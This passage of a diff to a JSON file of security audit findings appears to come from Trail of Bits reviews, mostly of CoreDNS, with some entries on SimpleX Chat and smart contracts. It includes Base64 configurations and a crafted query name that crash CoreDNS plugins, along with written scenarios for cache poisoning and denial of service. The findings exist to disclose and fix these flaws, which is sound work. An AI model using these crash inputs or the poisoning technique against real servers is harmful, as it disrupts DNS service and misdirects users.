cm5ldGVzaW9kb2NzY29uY2VwdHNzdG9yYWdldm9sdW1lcyMgIiIiIiIiIiIiIiIiJyCFmIWlsZj//4WuhZilr4WY5bCR mPCd Figure 4.2: The Base64-encoded forward configuration file Specifying a configuration file like that shown above would cause CoreDNS to panic when attempting to access the first element of zones : panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/forward.parseStanza(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:97 +0x972 github.com/coredns/coredns/plugin/forward.parseForward(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:81 +0x5e github.com/coredns/coredns/plugin/forward.setup(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:22 +0x33 github.com/coredns/caddy.executeDirectives(0xc0000ea800, {0x7ffdf9f6e6ed, 0x36}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc00056a860, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc00024ea80}, 0xc00024ea80, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc00024ea80}, 0xc0000ea800, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc00024ea80}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 4.3: CoreDNS panics when loading the forward configuration. Exploit Scenario An operator of a CoreDNS server misconfigures the forward plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, verify that the zones variable has the correct number of elements before indexing it.
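For example, a length check of the following shape in parseStanza would turn the panic into a configuration error; this sketch reuses the names from figure 4.1, and the error message is illustrative:
zones := plugin.Host(f.from).NormalizeExact()
// Fail gracefully when normalization yields no zones instead of indexing zones[0].
if len(zones) == 0 {
    return f, fmt.Errorf(\"unable to normalize '%s'\", origFrom)
}
f.from = zones[0]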
Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "1. X3DH does not apply HKDF to generate secrets ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The extended triple Diffie-Hellman (X3DH) key agreement protocol works by computing three separate Diffie-Hellman computations between pairs of keys. In particular, each party has a longer term private and public key pair as well as a more short-term private and public key pair. The three separate Diffie-Hellman computations are performed between the various pairs of long term and short term keys. The key agreement is performed this way to simultaneously authenticate each party and provide forward secrecy, which limits the impact of compromised keys. When performing the X3DH key agreement, the final shared secret is formed by applying HKDF to the concatenation of all three Diffie-Hellman outputs. The computation is performed this way so that the shared secret depends on the entropy of all three Diffie-Hellman computations. If the X3DH protocol is being used to generate multiple shared secrets (which is the case for SimpleX), then these secrets should be formed by computing the HKDF over all three Diffie-Hellman outputs and then splitting the output of HKDF into separate shared secrets. However, as shown in Figure 1.1, the SimpleX implementation of X3DH uses each of the three Diffie-Hellman outputs as separate secrets for the Double Ratchet protocol, rather than inputting them into HKDF and splitting the output. x3dhSnd :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhSnd spk1 spk2 ( E2ERatchetParams _ rk1 rk2) = x3dh (publicKey spk1, rk1) (dh' rk1 spk2) (dh' rk2 spk1) (dh' rk2 spk2) x3dhRcv :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhRcv rpk1 rpk2 ( E2ERatchetParams _ sk1 sk2) = x3dh (sk1, publicKey rpk1) (dh' sk2 rpk1) (dh' sk1 rpk2) (dh' sk2 rpk2) x3dh :: DhAlgorithm a => ( PublicKey a, PublicKey a) -> DhSecret a -> DhSecret a -> DhSecret a -> RatchetInitParams x3dh (sk1, rk1) dh1 dh2 dh3 = RatchetInitParams {assocData, ratchetKey = RatchetKey sk, sndHK = Key hk, rcvNextHK = Key nhk} where assocData = Str $ pubKeyBytes sk1 <> pubKeyBytes rk1 (hk, rest) = B .splitAt 32 $ dhBytes' dh1 <> dhBytes' dh2 <> dhBytes' dh3 (nhk, sk) = B .splitAt 32 rest Figure 1.1: simplexmq/src/Simplex/Messaging/Crypto/Ratchet.hs#L98-L112 Performing the X3DH protocol this way will increase the impact of compromised keys and have implications for the theoretical forward secrecy of the protocol. To see why this is the case, consider what happens if a single key pair, (sk2 , spk2) , is compromised. In the current implementation, if an attacker compromises this key pair, then they can immediately recover the header key, hk , and the ratchet key, sk . However, if this were implemented by first computing the HKDF over all three Diffie-Hellman outputs, then the attacker would not be able to recover these keys without also compromising another key pair. Note that SimpleX does not perform X3DH with long-term identity keys, as the SimpleX protocol does not rely on long-term keys to identify client devices.
Therefore, the impact of compromising a key will be less severe, as it will affect only the secrets of the current session. Exploit Scenario An attacker is able to compromise a single X3DH key pair of a client using SimpleX chat. Because of how the X3DH is performed, they are able to then compromise the client's header key and ratchet key and can decrypt some of their messages. Recommendations Short term, adjust the X3DH implementation so that HKDF is computed over the concatenation of dh1 , dh2 , and dh3 before obtaining the ratchet key and header keys.", + "title": "5. Use of deprecated PreferServerCipherSuites field ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "In the setTLSDefaults function of the tls plugin, the TLS configuration object includes a PreferServerCipherSuites field, which is set to true . func setTLSDefaults(tls *ctls.Config) { tls.MinVersion = ctls.VersionTLS12 tls.MaxVersion = ctls.VersionTLS13 tls.CipherSuites = [] uint16 { ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, } tls.PreferServerCipherSuites = true } Figure 5.1: plugin/tls/tls.go#L22-L37 In the past, this property controlled whether a TLS connection would use the cipher suites preferred by the server or by the client. However, as of Go 1.17, this field is ignored. According to the Go documentation for crypto/tls , \"Servers now select the best mutually supported cipher suite based on logic that takes into account inferred client hardware, server hardware, and security.\" When CoreDNS is built using a recent Go version, the use of this property is redundant and may lead to false assumptions about how cipher suites are negotiated in a connection to a CoreDNS server. Recommendations Short term, add this issue to the internal issue tracker. Additionally, when support for Go versions older than 1.17 is entirely phased out of CoreDNS, remove the assignment to the deprecated PreferServerCipherSuites field.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "6. Use of the MD5 hash function to detect Corefile changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The reload plugin is designed to automatically detect changes to a Corefile and to reload it if necessary. To determine whether a file has changed, the plugin periodically compares the current MD5 hash of the file to the last hash calculated for it ( plugin/reload/reload.go#L81-L107 ). If the values are different, it reloads the Corefile. However, the MD5 hash function's vulnerability to collisions decreases the reliability of this process; if two different files produce the same hash value, the plugin will not detect the difference between them. Exploit Scenario An operator of a CoreDNS server modifies a Corefile, but the MD5 hash of the modified file collides with that of the old file. As a result, the reload plugin does not detect the change. Instead, it continues to use the outdated server configuration without alerting the operator to its use.
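A collision-resistant hash function closes this gap. The following sketch shows a SHA-512-based comparison using Go's crypto/sha512 package; the helper name and surrounding logic are illustrative, not the plugin's actual code:
import \"crypto/sha512\"

// corefileChanged reports whether the Corefile bytes differ from the
// previously recorded digest. Unlike MD5, SHA-512 offers collision
// resistance, so two different Corefiles will not share a digest.
func corefileChanged(corefile []byte, lastSum [sha512.Size]byte) bool {
    return sha512.Sum512(corefile) != lastSum
}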
Recommendations Short term, improve the robustness of the reload plugin by using the SHA-512 hash function instead of MD5.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1810,59 +4500,79 @@ ] }, { - "title": "2. The pad function is incorrect for long messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The pad function from the Simplex.Messaging.Crypto module uses the fromIntegral function, resulting in an integer overflow bug that leads to incorrect length encoding for messages longer than 65535 bytes (Figure 2.1). At the moment, the function appears to be called only with messages that are less than that; however, due to the general nature of the module, there is a risk of using a pad with longer messages as the message length assumption is not documented. pad :: ByteString -> Int -> Either CryptoError ByteString pad msg paddedLen | padLen >= 0 = Right $ encodeWord16 (fromIntegral len) <> msg <> B .replicate padLen '#' | otherwise = Left CryptoLargeMsgError where len = B .length msg padLen = paddedLen - len - 2 Figure 2.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L805-L811 Exploit Scenario The pad function is used on messages longer than 65535 bytes, introducing a security vulnerability. Recommendations Short term, change the pad function to check whether the message length fits into 16 bits and return CryptoLargeMsgError if it does not. Long term, write unit tests for the pad function. Avoid using fromIntegral to cast to smaller integer types; instead, create a new function that safely casts to smaller types and returns Maybe .", + "title": "7. Use of default math/rand seed in grpc and forward plugins' random server-selection policy ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The grpc and forward plugins use the random policy for selecting upstream servers. The implementation of this policy in the two plugins is identical and uses the math/rand package from the Go standard library. func (r *random) List(p []*Proxy) []*Proxy { switch len (p) { case 1 : return p case 2 : if rand.Int()% 2 == 0 { return []*Proxy{p[ 1 ], p[ 0 ]} // swap } return p } perms := rand.Perm( len (p)) rnd := make ([]*Proxy, len (p)) for i, p1 := range perms { rnd[i] = p[p1] } return rnd } Figure 7.1: plugin/grpc/policy.go#L19-L37 As highlighted in figure 7.1, the random policy uses either rand.Int or rand.Perm to choose the order of the upstream servers, depending on the number of servers that have been configured. Unless a program using the random policy explicitly calls rand.Seed , the top-level functions rand.Int and rand.Perm behave as if they were seeded with the value 1 , which is the default seed for math/rand . CoreDNS does not call rand.Seed to seed the global state of math/rand . Without this call, the grpc and forward plugins' random selection of upstream servers is likely to be trivially predictable and the same every time CoreDNS is restarted. Exploit Scenario An attacker targets a CoreDNS instance in which the grpc or forward plugin is enabled. The attacker exploits the deterministic selection of upstream servers to overwhelm a specific server, with the goal of causing a DoS condition or performing an attack such as a timing attack. Recommendations Short term, instantiate a rand.Rand type with a unique seed, rather than drawing random numbers from the global math/rand state.
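A sketch of that recommendation, with the constructor and field names chosen here for illustration:
// Each policy instance draws from its own source, seeded once at
// construction time rather than relying on math/rand's default seed of 1.
type random struct {
    rnd *rand.Rand
}

func newRandom() *random {
    return &random{rnd: rand.New(rand.NewSource(time.Now().UnixNano()))}
}
Calls such as r.rnd.Perm(len(p)) and r.rnd.Int() would then replace the package-level rand.Perm and rand.Int.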
CoreDNS takes this approach in several other areas, such as the loop plugin .", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "3. The unPad function throws exception for short messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The unPad function throws an undocumented exception when the input is empty or a single byte. This is due to the decodeWord16 function, which throws an IOException if the input is not exactly two bytes. The unPad function does not appear to be used on such short inputs in the current code. unPad :: ByteString -> Either CryptoError ByteString unPad padded | B .length rest >= len = Right $ B .take len rest | otherwise = Left CryptoLargeMsgError where ( lenWrd , rest) = B .splitAt 2 padded len = fromIntegral $ decodeWord16 lenWrd Figure 3.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L813-L819 Exploit Scenario The unPad function takes a user-controlled input and throws an exception that is not handled in a thread that is critical to the functioning of the protocol, resulting in a denial of service. Recommendations Short term, validate the length of the input passed to the unPad function and return an error if the input is too short. Long term, write unit tests for the unPad function to ensure the validation works as intended.", + "title": "8. Cache plugin does not account for hash table collisions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "To cache a DNS reply, CoreDNS maps the FNV-1 hash of the query name and type to the content of the reply in a hash table entry. func key(qname string , m *dns.Msg, t response.Type) ( bool , uint64 ) { // We don't store truncated responses. if m.Truncated { return false , 0 } // Nor errors or Meta or Update. if t == response.OtherError || t == response.Meta || t == response.Update { return false , 0 } return true , hash(qname, m.Question[ 0 ].Qtype) } func hash(qname string , qtype uint16 ) uint64 { h := fnv.New64() h.Write([] byte { byte (qtype >> 8 )}) h.Write([] byte { byte (qtype)}) h.Write([] byte (qname)) return h.Sum64() } Figure 8.1: plugin/cache/cache.go#L68-L87 To check whether there is a cached reply for an incoming query, CoreDNS performs a hash table lookup for the query name and type. If it identifies a reply with a valid time to live (TTL), it returns the reply. CoreDNS assumes the stored DNS reply to be the correct one for the query, given the use of a hash table mapping. However, this assumption is faulty, as FNV-1 is a non-cryptographic hash function that does not offer collision resistance, and there exist utilities for generating colliding inputs to FNV-1 . As a result, it is likely possible to construct a valid (qname , qtype) pair that collides with another one, in which case CoreDNS could serve the incorrect cached reply to a client. Exploit Scenario An attacker aiming to poison the cache of a CoreDNS server generates a valid (qname* , qtype*) pair whose FNV-1 hash collides with a commonly queried (qname , qtype) pair. The attacker gains control of the authoritative name server for qname* and points its qtype* record to an address of his or her choosing. The attacker also configures the server to send a second record when (qname* , qtype*) is queried: a qtype record for qname that points to a malicious address.
The attacker queries the CoreDNS server for (qname* , qtype*) , and the server caches the reply with the malicious address. Soon thereafter, when a legitimate user queries the server for (qname , qtype) , CoreDNS serves the user the cached reply for (qname* , qtype*) , since it has an identical FNV-1 hash. As a result, the legitimate user's DNS client sees the malicious address as the record for qname . Recommendations Short term, store the original name and type of a query in the value of a hash table entry. After looking up the key for an incoming request in the hash table, verify that the query name and type recorded alongside the cached reply match those of the request. If they do not, disregard the cached reply. Short term, use the keyed hash function SipHash instead of FNV-1. SipHash was designed for speed and derives a 64-bit output value from an input value and a 128-bit secret key; this method adds pseudorandomness to a hash table key and makes it more difficult for an attacker to generate collisions offline. CoreDNS should use the crypto/rand package from Go's standard library to generate a cryptographically random secret key for SipHash on startup.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Undetermined" + ] + }, + { + "title": "9. Index-out-of-range reference in kubernetes plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The parseRequest function of the kubernetes plugin parses a DNS request before using it to query Kubernetes. By fuzzing the function, we discovered an out-of-range issue that can cause a panic. The issue occurs when the function calls stripUnderscore with an empty string, as it does when it receives a request with the qname .o.o.po.pod.8 and the zone interwebs. // stripUnderscore removes a prefixed underscore from s. func stripUnderscore(s string ) string { if s[ 0 ] != '_' { return s } return s[ 1 :] } Figure 9.1: plugin/kubernetes/parse.go#L97 Because of the time constraints of the audit, we could not find a way to directly exploit this vulnerability. Although certain tools for sending DNS queries, like dig and host , verify the validity of a host before submitting a DNS query, it may be possible to exploit the vulnerability by using custom tooling or DNS over HTTPS (DoH). Exploit Scenario An attacker finds a way to submit a query with an invalid host (such as o.o.po.pod.8) to a CoreDNS server running as the DNS server for a Kubernetes endpoint. Because of the index-out-of-range bug, the kubernetes plugin causes CoreDNS to panic and crash, resulting in a DoS. Recommendations Short term, to prevent a panic, implement a check of the value of the string passed to the stripUnderscore function.", "labels": [ "Trail of Bits", "Severity: Undetermined", "Difficulty: Undetermined" ] }, { "title": "10. Calls to time.After() in select statements can lead to memory leaks ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", "body": "Calls to the time.After function in select/case statements within for loops can lead to memory leaks. This is because the garbage collector does not clean up the underlying Timer object until the timer has fired. A new timer is initialized at the start of each iteration of the for loop (and therefore with each select statement), which requires resources. As a result, if many routines originate from a time.After call, the system may experience memory overconsumption.
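The affected loop is shown in figure 10.1 below. For contrast, a ticker-based variant allocates a single reusable timer for the life of the loop; this sketch uses the one-minute interval from the clouddns plugin:
ticker := time.NewTicker(1 * time.Minute)
defer ticker.Stop()
for {
    select {
    case <-ctx.Done():
        return
    case <-ticker.C:
        // Periodic work goes here; the Ticker's channel is reused on
        // every iteration, so no new Timer is allocated per pass.
    }
}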
for { select { case <-ctx.Done(): log.Debugf( \"Breaking out of CloudDNS update loop for %v: %v\" , h.zoneNames, ctx.Err()) return case <-time.After( 1 * time.Minute) : if err := h.updateZones(ctx); err != nil && ctx.Err() == nil /* Don't log error if ctx expired. */ { log.Errorf( \"Failed to update zones %v: %v\" , h.zoneNames, err) } Figure 10.1: A time.After() routine that causes a memory leak ( plugin/clouddns/clouddns.go#L85-L93 ) The following portions of the code contain similar patterns: plugin/clouddns/clouddns.go#L85-L93 plugin/azure/azure.go#L87-96 plugin/route53/route53.go#87-96 Exploit Scenario An attacker finds a way to overuse a function, which leads to overconsumption of a CoreDNS server's memory and a crash. Recommendations Short term, use a ticker instead of the time.After function in select/case statements included in for loops. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, avoid using the time.After method in for-select routines and periodically use a Semgrep query to detect similar patterns in the code. References DevelopPaper post on the memory leak vulnerability in time.After; Golang <-time.After() Is Not Garbage Collected before Expiry (Medium post)", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "11. Incomplete list of debugging data exposed by the prometheus plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Enabling the prometheus (metrics) plugin exposes an HTTP endpoint that lists CoreDNS metrics. The documentation for the plugin indicates that it reports data such as the total number of queries and the size of responses. However, other data that is reported by the plugin (and also available through the pprof plugin) is not listed in the documentation. This includes Go runtime debugging information such as the number of running goroutines and the duration of Go garbage collection runs. Because this data is not listed in the prometheus plugin documentation, operators may initially be unaware of its exposure.
Moreover, the data could be instrumental in formulating an attack. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile=\"0\"} 4.4756e-05 go_gc_duration_seconds{quantile=\"0.25\"} 6.0522e-05 go_gc_duration_seconds{quantile=\"0.5\"} 7.1476e-05 go_gc_duration_seconds{quantile=\"0.75\"} 0.000105802 go_gc_duration_seconds{quantile=\"1\"} 0.000205775 go_gc_duration_seconds_sum 0.010425592 go_gc_duration_seconds_count 123 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 18 # HELP go_info Information about the Go environment. # TYPE go_info gauge go_info{version=\"go1.17.3\"} 1 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge Figure 11.1: Examples of the data exposed by prometheus and omitted from the documentation Exploit Scenario An attacker discovers the metrics exposed by CoreDNS over port 9253. The attacker then monitors the endpoint to determine the effectiveness of various attacks in crashing the server. Recommendations Short term, document all data exposed by the prometheus plugin. Additionally, consider changing the data exposed by the prometheus plugin to exclude Go runtime data available through the pprof plugin.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "1. Risk of misconfigured GasPriceOracle state variables that can lock L2 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-11-optimism-securityreview.pdf", - "body": "When bootstrapping the L2 network operated by op-geth , the GasPriceOracle contract is pre-deployed to L2, and its contract state variables are used to specify the L1 costs to be charged on L2. Three state variables are used to compute the costs (decimals, overhead, and scalar), which can be updated through transactions sent to the node. However, these state variables could be misconfigured in a way that sets gas prices high enough to prevent transactions from being processed. For example, if overhead were set to the maximum value, a 256-bit unsigned integer, the subsequent transactions would not be accepted. In an end-to-end test of the above example, contract bindings used in op-e2e tests (such as the GasPriceOracle bindings used to update the state variables) were no longer able to make subsequent transactions/updates, as calls to SetOverhead or SetDecimals resulted in a deadlock. Sending a transaction directly through the RPC client did not produce a transaction receipt that could be fetched. Recommendations Short term, implement checks to ensure that GasPriceOracle parameters can be updated if fee parameters were previously misconfigured. This could be achieved by adding an exception to GasPriceOracle fees when the contract owner calls methods within the contract or by setting a maximum fee cap. Long term, develop operational procedures to ensure the system is not deployed in or otherwise entered into an unexpected state as a result of operator actions. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "title": "12. 
Cloud integrations require cleartext storage of keys in the Corefile ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The route53 , azure , and clouddns plugins enable CoreDNS to interact with cloud providers (AWS, Azure, and the Google Cloud Platform (GCP), respectively). To access clouddns , a user enters the path to the file containing his or her GCP credentials. When using route53 , CoreDNS pulls the AWS credentials that the user has entered in the Corefile. If the AWS credentials are not included in the Corefile, CoreDNS will pull them in the same way that the AWS command-line interface (CLI) would. While operators have options for the way that they provide AWS and GCP credentials, Azure credentials must be pulled directly from the Corefile. Furthermore, the CoreDNS documentation lacks guidance on the risks of storing AWS, Azure, or GCP credentials in local configuration files . Exploit Scenario An attacker or malicious internal user gains access to a server running CoreDNS. The malicious actor then locates the Corefile and obtains credentials for a cloud provider, thereby gaining access to a cloud infrastructure. Recommendations Short term, remove support for entering cloud provider credentials in the Corefile in cleartext. Instead, load credentials for each provider in the manner recommended in that provider's documentation and implemented by its CLI utility. CoreDNS should also refuse to load credential files with overly broad permissions and warn users about the risks of such files.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "1. Transfer operations may silently fail due to the lack of contract existence checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The pool fails to check that a contract exists before performing transfers. As a result, the pool may assume that failed transactions involving destroyed tokens or tokens that have not yet been deployed were successful. Transfers.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom use low-level calls to perform transfers without confirming the contract's existence: ) internal { ( bool success , bytes memory returnData) = address (token).call( abi.encodeWithSelector(token.transfer.selector, to, value) ); require (success && (returnData.length == 0 || abi.decode(returnData, ( bool ))), \"Transfer fail\" ); } Figure 1.1: rmm-core/contracts/libraries/Transfers.sol#16-21 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 1.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the tokens to be transferred have not yet been deployed or have been destroyed, safeTransfer and safeTransferFrom will return success even though the transfer was not executed. Exploit Scenario The pool contains two tokens: A and B. The A token has a bug, and the contract is destroyed. Bob is not aware of the issue and swaps 1,000 B tokens for A tokens. Bob successfully transfers 1,000 B tokens to the pool but does not receive any A tokens in return. As a result, Bob loses 1,000 B tokens.
Recommendations Short term, implement a contract existence check before the low-level calls in Transfer.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom . This will ensure that a swap will revert if the token to be bought no longer exists, preventing the pool from accepting the token to be sold without returning any tokens in exchange. Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", + "title": "13. Lack of rate-limiting controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "CoreDNS does not enforce rate limiting of DNS queries, including those sent via DoH. As a result, we were able to issue the same request thousands of times in less than one minute over the HTTP endpoint /dns-query . Figure 13.1: We sent 3,424 requests to CoreDNS without being rate limited. During our tests, the lack of rate limiting did not appear to affect the application. However, processing requests sent at such a high rate can consume an inordinate amount of host resources, and a lack of rate limiting can facilitate DoS and DNS amplification attacks. Exploit Scenario An attacker floods a CoreDNS server with HTTP requests, leading to a DoS condition. Recommendations Short term, consider incorporating the rrl plugin, used for the rate limiting of DNS queries, into the CoreDNS codebase. Additionally, implement rate limiting on all API endpoints. An upper bound can be applied at a high level to all endpoints exposed by CoreDNS. Long term, run stress tests to ensure that the rate limiting enforced by CoreDNS is robust.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "11. Code duplication in crowdloans pallet ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ParallelFinance.pdf", - "body": "A number of extrinsics in the crowdloans pallet have duplicate code. The close , reopen , and auction_succeeded extrinsics have virtually identical logic. The migrate_pending and refund extrinsics are also fairly similar. Exploit Scenario A vulnerability is found in the duplicate code, but it is patched in only one place. Recommendations Short term, refactor the close , reopen , and auction_succeeded extrinsics into one function, to be called with values specific to the extrinsics. Refactor common pieces of logic in the migrate_pending and refund extrinsics. Long term, avoid code duplication, as it makes the system harder to review and update. Perform regular code reviews and track any logic that is duplicated.", + "title": "14. Lack of a limit on the size of response bodies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The ioutil.ReadAll function reads from a source input until encountering an error or the end of the file, at which point it returns the data that it read. The toMsg function, which processes requests for the HTTP server, uses ioutil.ReadAll to parse requests and to read POST bodies. However, there is no limit on the size of request bodies. Using ioutil.ReadAll to parse a large request that is loaded multiple times may exhaust the system's memory, causing a DoS.
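The affected function appears in figure 14.1 below; a bounded variant might read as follows, where the one-megabyte cap is an illustrative value rather than one taken from CoreDNS:
const maxBodySize = 1 << 20 // illustrative 1 MiB cap on request bodies

func toMsgLimited(r io.ReadCloser) (*dns.Msg, error) {
    // io.LimitReader stops reading after maxBodySize bytes, bounding the
    // memory that a single oversized POST body can consume.
    buf, err := io.ReadAll(io.LimitReader(r, maxBodySize))
    if err != nil {
        return nil, err
    }
    m := new(dns.Msg)
    return m, m.Unpack(buf)
}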
func toMsg(r io.ReadCloser) (*dns.Msg, error ) { buf, err := io.ReadAll(r) if err != nil { return nil , err } m := new (dns.Msg) err = m.Unpack(buf) return m, err } Figure 14.1: plugin/pkg/doh/doh.go#L94-L102 Exploit Scenario An attacker generates multiple POST requests with long request bodies to /dns-query , leading to the exhaustion of its resources. Recommendations Short term, use the io.LimitReader function or another mechanism to limit the size of request bodies. Long term, consider implementing application-wide limits on the size of request bodies to prevent DoS attacks.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "2. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Although dependency scans did not indicate a direct threat to the project under review, yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details these issues. CVE ID", + "title": "15. Index-out-of-range panic in grpc plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Initializing the grpc plugin involves parsing the relevant configuration section. func parseStanza(c *caddy.Controller) (*GRPC, error ) { g := newGRPC() if !c.Args(&g.from) { return g, c.ArgErr() } g.from = plugin.Host(g.from).NormalizeExact()[ 0 ] // only the first is used. Figure 15.1: plugin/grpc/setup.go#L53-L59 An invalid configuration file for the grpc plugin could cause the call to NormalizeExact (highlighted in figure 15.1) to return a value with zero elements. A Base64-encoded example of such a configuration file is shown below. MApncnBjIDAwMDAwMDAwMDAwhK2FhYKtMIStMITY2NnY2dnY7w== Figure 15.2: The Base64-encoded grpc configuration file Specifying a configuration file like that in figure 15.2 would cause CoreDNS to panic when attempting to access the first element of the return value.
panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/grpc.parseStanza(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:59 +0x31b github.com/coredns/coredns/plugin/grpc.parseGRPC(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:45 +0x5e github.com/coredns/coredns/plugin/grpc.setup(0x1e4dcc0) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:17 +0x30 github.com/coredns/caddy.executeDirectives(0xc0000e2900, {0x7ffc15b696e0, 0x31}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000269300, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x2239518, 0xc0002b2980}, 0xc0002b2980, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x2239518, 0xc0002b2980}, 0xc0000e2900, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x2239518, 0xc0002b2980}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 15.3: CoreDNS panics when loading the grpc configuration. Exploit Scenario An operator of a CoreDNS server misconfigures the grpc plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is difficult for the operator to troubleshoot and fix the issue. 